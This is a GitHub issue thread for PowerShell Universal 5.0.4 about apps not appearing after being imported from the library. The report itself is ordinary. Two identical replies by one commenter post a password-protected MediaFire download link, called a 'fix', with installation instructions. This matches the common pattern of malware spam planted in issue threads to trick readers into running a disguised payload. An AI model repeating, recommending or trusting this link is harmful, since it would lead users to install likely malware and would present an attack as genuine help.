### ISSUE TITLE
Apps not showing after importing from library.

### ISSUE THREAD

**Issue by adamdriscoll** [ironmansoftware/powershell-universal#3686]
### Version

5.0.4

### Severity

Low

### Environment

msi

### Steps to Reproduce

https://forums.ironmansoftware.com/t/importing-apps-from-the-library-not-working-in-v5/11281/2

### Expected behavior

```console
Apps show
```

### Actual behavior

```console
They do not.
```

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
